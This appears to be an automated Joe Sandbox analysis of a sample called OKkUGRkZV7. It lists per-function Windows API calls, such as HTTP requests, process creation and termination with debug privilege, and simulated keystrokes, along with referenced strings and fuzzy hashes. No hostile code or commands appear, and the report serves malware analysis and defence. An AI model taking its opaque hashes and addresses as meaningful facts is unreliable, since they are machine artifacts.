                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                              • String ID: U
                                              • API String ID: 4009187628-3372436214
                                              • Opcode ID: 2ef8cb3185eeb1811fc3a47d0db025cf735c96a51c2cc229f32bb19a3887a791
                                              • Instruction ID: 0221af811a786119a7463e76097216f0e1b82a47c5c8ce44678cd3910ecde29b
                                              • Opcode Fuzzy Hash: 2ef8cb3185eeb1811fc3a47d0db025cf735c96a51c2cc229f32bb19a3887a791
                                              • Instruction Fuzzy Hash: B771AE31400205DFCF339F64C884AAA7BB9FF48310F15926AFD59AA2A6D7359C91DF50
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003B1A50
                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003B1A7C
                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003B1ABE
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003B1AD3
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B1AE0
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003B1B10
                                              • InternetCloseHandle.WININET(00000000), ref: 003B1B57
                                                • Part of subcall function 003B2483: GetLastError.KERNEL32(?,?,003B1817,00000000,00000000,00000001), ref: 003B2498
                                                • Part of subcall function 003B2483: SetEvent.KERNEL32(?,?,003B1817,00000000,00000000,00000001), ref: 003B24AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                              • String ID:
                                              • API String ID: 2603140658-3916222277
                                              • Opcode ID: 23d043cba992f983dc4c258d3f1c3d356dfcc4956042b8bce81c99dd2e78a462
                                              • Instruction ID: a4a34ef105e501ae5773a6214d96e9e054a0b6d00b182ea77a6bdfec85250619
                                              • Opcode Fuzzy Hash: 23d043cba992f983dc4c258d3f1c3d356dfcc4956042b8bce81c99dd2e78a462
                                              • Instruction Fuzzy Hash: D8414DB1501219BFEB139F50CC99FFB7BADEF08358F00412AFA059A541E774AE449BA0
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003CF910), ref: 003B8D28
                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003CF910), ref: 003B8D5C
                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003B8ED6
                                              • SysFreeString.OLEAUT32(?), ref: 003B8F00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                              • String ID:
                                              • API String ID: 560350794-0
                                              • Opcode ID: 8f4ebdf74c55a8732c66954c8095178c25c08231149ece2d9f91fe89ed2fdf9e
                                              • Instruction ID: b23eb544ad94820b923d08d7eca3585479d68ae775ab5dc144f87692344c387b
                                              • Opcode Fuzzy Hash: 8f4ebdf74c55a8732c66954c8095178c25c08231149ece2d9f91fe89ed2fdf9e
                                              • Instruction Fuzzy Hash: 36F12971A00209AFCF15EF94C884EEEB7B9FF45318F118459FA05AB651DB31AE46CB60
                                              APIs
                                              • _memset.LIBCMT ref: 003BF6B5
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BF848
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BF86C
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BF8AC
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BF8CE
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003BFA4A
                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003BFA7C
                                              • CloseHandle.KERNEL32(?), ref: 003BFAAB
                                              • CloseHandle.KERNEL32(?), ref: 003BFB22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                              • String ID:
                                              • API String ID: 4090791747-0
                                              • Opcode ID: 40a6e42e7e1223f406c62726caeebd13ff507519f42cb037649fc43bff7e0a64
                                              • Instruction ID: 21b2f44802acf69b1498bdbe576dbe430373731d82a19ce56c533b7a91b4d4db
                                              • Opcode Fuzzy Hash: 40a6e42e7e1223f406c62726caeebd13ff507519f42cb037649fc43bff7e0a64
                                              • Instruction Fuzzy Hash: A6E1B0316042009FC716EF24C881BABBBE5EF85354F14896DF9898F6A2CB31EC45CB52
                                              APIs
                                                • Part of subcall function 003A466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003A3697,?), ref: 003A468B
                                                • Part of subcall function 003A466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003A3697,?), ref: 003A46A4
                                                • Part of subcall function 003A4A31: GetFileAttributesW.KERNEL32(?,003A370B), ref: 003A4A32
                                              • lstrcmpiW.KERNEL32(?,?), ref: 003A4D40
                                              • _wcscmp.LIBCMT ref: 003A4D5A
                                              • MoveFileW.KERNEL32(?,?), ref: 003A4D75
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                              • String ID:
                                              • API String ID: 793581249-0
                                              • Opcode ID: 001e1bf4c21efc4a5ed4c10b0cc7b2cee662c904b21ffe588e41ad7e7665caba
                                              • Instruction ID: 066db907b4a049e6b9965aef3b795f04260a724be72ef9d53b715bfda007ad78
                                              • Opcode Fuzzy Hash: 001e1bf4c21efc4a5ed4c10b0cc7b2cee662c904b21ffe588e41ad7e7665caba
                                              • Instruction Fuzzy Hash: F15142B24083459BC726DBA4D8819DFB3ECEF85350F00492EB689D7152EF74A588C766
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003C86FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              • Opcode ID: d9c336331cc541fb5a09b59166bb8e598e72f72f4e39956e69e661631b75921b
                                              • Instruction ID: 138a0bf4eae0496724fbb0b30a5a08715e4e853e7bb5f33ea3fb1b2de587047a
                                              • Opcode Fuzzy Hash: d9c336331cc541fb5a09b59166bb8e598e72f72f4e39956e69e661631b75921b
                                              • Instruction Fuzzy Hash: 9451B430500244BEEF229F24DC89FAD7BA9EB05354F604129FA55EA5E1DF71AF90CB50
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0037C2F7
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0037C319
                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0037C331
                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0037C34F
                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0037C370
                                              • DestroyIcon.USER32(00000000), ref: 0037C37F
                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0037C39C
                                              • DestroyIcon.USER32(?), ref: 0037C3AB
                                                • Part of subcall function 003CA4AF: DeleteObject.GDI32(00000000), ref: 003CA4E8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                              • String ID:
                                              • API String ID: 2819616528-0
                                              • Opcode ID: 8eae9e03a64244dd1420a4c54238fbe9467afcb725071159542003b2da885d2b
                                              • Instruction ID: ade7a3a8ba4f054f1c346ed12cdcd494993c424a91d54bebbeaac32fae347e2d
                                              • Opcode Fuzzy Hash: 8eae9e03a64244dd1420a4c54238fbe9467afcb725071159542003b2da885d2b
                                              • Instruction Fuzzy Hash: 7E517974610609AFDB26DF64CC45FAB3BE9EB48310F108528F906EB690DB74AC90DB50
                                              APIs
                                                • Part of subcall function 0039A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0039A84C
                                                • Part of subcall function 0039A82C: GetCurrentThreadId.KERNEL32 ref: 0039A853
                                                • Part of subcall function 0039A82C: AttachThreadInput.USER32(00000000,?,00399683,?,00000001), ref: 0039A85A
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0039968E
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003996AB
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003996AE
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 003996B7
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003996D5
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003996D8
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 003996E1
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003996F8
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003996FB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              • Opcode ID: d13ff05b74cb0929c2b1d5aaf21dc4c67b145bc5702b1f378da925339d7f741f
                                              • Instruction ID: d98b9d8387680f67b0c8184e557c781eccd922c245372264010a9e1db2b7f416
                                              • Opcode Fuzzy Hash: d13ff05b74cb0929c2b1d5aaf21dc4c67b145bc5702b1f378da925339d7f741f
                                              • Instruction Fuzzy Hash: C411E571910618BEFA116F64DC49F6A7F1EDB4C7A0F110426F644EB0A0C9F36C10DBA4
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0039853C,00000B00,?,?), ref: 0039892A
                                              • HeapAlloc.KERNEL32(00000000,?,0039853C,00000B00,?,?), ref: 00398931
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0039853C,00000B00,?,?), ref: 00398946
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0039853C,00000B00,?,?), ref: 0039894E
                                              • DuplicateHandle.KERNEL32(00000000,?,0039853C,00000B00,?,?), ref: 00398951
                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0039853C,00000B00,?,?), ref: 00398961
                                              • GetCurrentProcess.KERNEL32(0039853C,00000000,?,0039853C,00000B00,?,?), ref: 00398969
                                              • DuplicateHandle.KERNEL32(00000000,?,0039853C,00000B00,?,?), ref: 0039896C
                                              • CreateThread.KERNEL32(00000000,00000000,00398992,00000000,00000000,00000000), ref: 00398986
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                              • String ID:
                                              • API String ID: 1957940570-0
                                              • Opcode ID: 034178ec0add21d3795b2578758f94fa96d73fb49c28f931d2ba2cf3f24a9dd6
                                              • Instruction ID: 851cd210e0dd647218f7a7b8beb83b1870f77d049a1ea7b617cf5c20434be439
                                              • Opcode Fuzzy Hash: 034178ec0add21d3795b2578758f94fa96d73fb49c28f931d2ba2cf3f24a9dd6
                                              • Instruction Fuzzy Hash: 8B01BBB5240308FFE711ABA5DC4DF6B7BADEB89711F448421FA05DB1A1CA71AC00CB20
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NULL Pointer assignment$Not an Object type
                                              • API String ID: 0-572801152
                                              • Opcode ID: ef43df0c63e5acb21ef089391854cf4e56906d16e2f99d1119167a015263d179
                                              • Instruction ID: 1c024927c8ed11a1bf86b45d717d40a5aea64f677e4ca4cd68e93801e4857db9
                                              • Opcode Fuzzy Hash: ef43df0c63e5acb21ef089391854cf4e56906d16e2f99d1119167a015263d179
                                              • Instruction Fuzzy Hash: FEC19171A002199FDF11DF59D884BEEB7F9AB48318F15846AEB05AB681E770ED40CB90
                                              APIs
                                                • Part of subcall function 0039710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?,?,00397455), ref: 00397127
                                                • Part of subcall function 0039710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?), ref: 00397142
                                                • Part of subcall function 0039710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?), ref: 00397150
                                                • Part of subcall function 0039710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?), ref: 00397160
                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003B9806
                                              • _memset.LIBCMT ref: 003B9813
                                              • _memset.LIBCMT ref: 003B9956
                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 003B9982
                                              • CoTaskMemFree.OLE32(?), ref: 003B998D
                                              Strings
                                              • NULL Pointer assignment, xrefs: 003B99DB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                              • String ID: NULL Pointer assignment
                                              • API String ID: 1300414916-2785691316
                                              • Opcode ID: ffbe5e7b7b30800ebb7b72485a0fc9c22648a8294ae901fad6c5a712beb4563f
                                              • Instruction ID: bfc0f7e8c2a373f0233293b2a665d716dbc4c844936917b0f669a89b05e91b1a
                                              • Opcode Fuzzy Hash: ffbe5e7b7b30800ebb7b72485a0fc9c22648a8294ae901fad6c5a712beb4563f
                                              • Instruction Fuzzy Hash: 3F914A71D00228EBDB12DFA5DC41EDEBBB9EF08714F10415AF619AB291DB716A44CFA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003C6E24
                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 003C6E38
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003C6E52
                                              • _wcscat.LIBCMT ref: 003C6EAD
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 003C6EC4
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003C6EF2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window_wcscat
                                              • String ID: SysListView32
                                              • API String ID: 307300125-78025650
                                              • Opcode ID: cef7f1fa037530a91df6903c7403c0dcc2876a200b1e6ea12f012a743147bafb
                                              • Instruction ID: 65bd245b03065eaffcb2e3f40e658f98ee270559023286ff572d3836e5f1fa4c
                                              • Opcode Fuzzy Hash: cef7f1fa037530a91df6903c7403c0dcc2876a200b1e6ea12f012a743147bafb
                                              • Instruction Fuzzy Hash: E2418175A00348AFDB229F64CC86FEE77E9EF08350F11442EF545E7291D6729D848B60
                                              APIs
                                                • Part of subcall function 003A3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 003A3C7A
                                                • Part of subcall function 003A3C55: Process32FirstW.KERNEL32(00000000,?), ref: 003A3C88
                                                • Part of subcall function 003A3C55: CloseHandle.KERNEL32(00000000), ref: 003A3D52
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BE9A4
                                              • GetLastError.KERNEL32 ref: 003BE9B7
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BE9E6
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 003BEA63
                                              • GetLastError.KERNEL32(00000000), ref: 003BEA6E
                                              • CloseHandle.KERNEL32(00000000), ref: 003BEAA3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 2533919879-2896544425
                                              • Opcode ID: 036a273c620e56d8e32156473674f6a83e9ff9b9fbacd77fba88ff930c8ee019
                                              • Instruction ID: ce7bbfed17c9b6a77b97161935c940b6bb9573fef6c45b031da628d3ff6f9d83
                                              • Opcode Fuzzy Hash: 036a273c620e56d8e32156473674f6a83e9ff9b9fbacd77fba88ff930c8ee019
                                              • Instruction Fuzzy Hash: B141B1312002009FDB12EF28CC96FAEBBE9AF41314F048419FA029F2D2CB75E804CB91
                                              APIs
                                              • LoadIconW.USER32(00000000,00007F03), ref: 003A3033
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: IconLoad
                                              • String ID: blank$info$question$stop$warning
                                              • API String ID: 2457776203-404129466
                                              • Opcode ID: a8c8304c8257f440c045441e4b9bf04e2a0b3939b0c3317ca81b976dc39b159c
                                              • Instruction ID: 227a865b8769703e0b7cbdda83d35f6c805613fcda0774b9d0f3c74275f8fa14
                                              • Opcode Fuzzy Hash: a8c8304c8257f440c045441e4b9bf04e2a0b3939b0c3317ca81b976dc39b159c
                                              • Instruction Fuzzy Hash: 6D11273534874ABEE71BDB18DC42CAB7B9CDF17360F21402AFA05AA181DB71AF4056A1
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003A4312
                                              • LoadStringW.USER32(00000000), ref: 003A4319
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003A432F
                                              • LoadStringW.USER32(00000000), ref: 003A4336
                                              • _wprintf.LIBCMT ref: 003A435C
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003A437A
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 003A4357
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wprintf
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 3648134473-3128320259
                                              • Opcode ID: 0b00bd2486e6844e4bc4a80e64d3e60ac6d50ebe811a0d394cbd584bdc49e01d
                                              • Instruction ID: c5f8bbf88470f99a6b88b27953208bfcbf79a9cef841a66cfc19a1f6a4242933
                                              • Opcode Fuzzy Hash: 0b00bd2486e6844e4bc4a80e64d3e60ac6d50ebe811a0d394cbd584bdc49e01d
                                              • Instruction Fuzzy Hash: 990162F6900208BFEB52ABA0DD89EF7776CDB08300F0005A5B745E6051EA756E954B74
                                              APIs
                                                • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                              • GetSystemMetrics.USER32(0000000F), ref: 003CD47C
                                              • GetSystemMetrics.USER32(0000000F), ref: 003CD49C
                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003CD6D7
                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003CD6F5
